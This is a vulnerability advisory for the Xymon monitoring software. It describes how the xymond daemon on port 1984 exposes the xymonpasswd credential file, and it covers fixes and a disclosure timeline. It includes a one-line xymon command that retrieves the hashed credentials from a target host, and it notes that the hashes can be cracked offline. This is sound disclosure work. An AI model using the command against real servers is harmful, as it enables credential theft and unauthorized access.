Software

Xymon http://xymon.sourceforge.net/

Versions affected: All 4.3 versions prior to 4.3.25 as well as 4.1.x and 4.2.x

Access to possibly confidential files in the Xymon configuration directory

The xymond daemon will allow anyone with network access to the xymond network port (1984) to download configuration files in the Xymon “etc” directory. In a default installation, the Apache htaccess file “xymonpasswd” controlling access to the administrator webpages is installed in this directory and is therefore available for download. The passwords in the file are hashed, but may then be brute-forced off-line. This bug may be triggered by anyone with network access to the xymond service on port 1984, unless access has been restricted with the “–status-senders” option (a non-default configuration).

Technical Background
It is possible to retrieve sensitive data via the network. The xymonpasswd file stores auth credentials for the web application. This file is (by default) placed in the “etc” directory and readable by the xymon daemon. The client tool xymon can be used to retrieve config files from a running Xymon daemon. Therefore, the tool can be misused to return the hashed credentials to access the web application. From a host on the same network the htpasswd file can be retrieved using the following command:

./xymon 10.10.10.10 "config xymonpasswd"

An attacker has direct access to legitimate user names and is also able to crack the returned hashes offline.

Solution
Administrators of existing installations should ensure that the xymonpasswd file is not readable by the userid running the xymond daemon. Permissions should be: Owner=webserver UID, group=webserver GID, mode rw-rw— (600). This will be the default configuration starting with Xymon 4.3.25. In addition, the “config” command will only allow access to regular files. By default, only files ending in “.cfg” may be directly retrieved, although this can be overridden by the administrator, and config files may include other files and directories using existing directives.

Alternatively, the file may be moved to a location outside the Xymon configuration directory. The Xymon cgioptions.cfg file must then be edited so CGI_USERADM_OPTS and CGI_CHPASSWD_OPTS include “–passwdfile=FILENAME”.

Time Line

2016-01-08 – Reported vulnerability to authors

2016-02-08 – Vulnerability has been fixed in Xymon version 4.3.25.

Resources

https://sourceforge.net/p/xymon/news/2016/02/xymon-4325-released—security-update/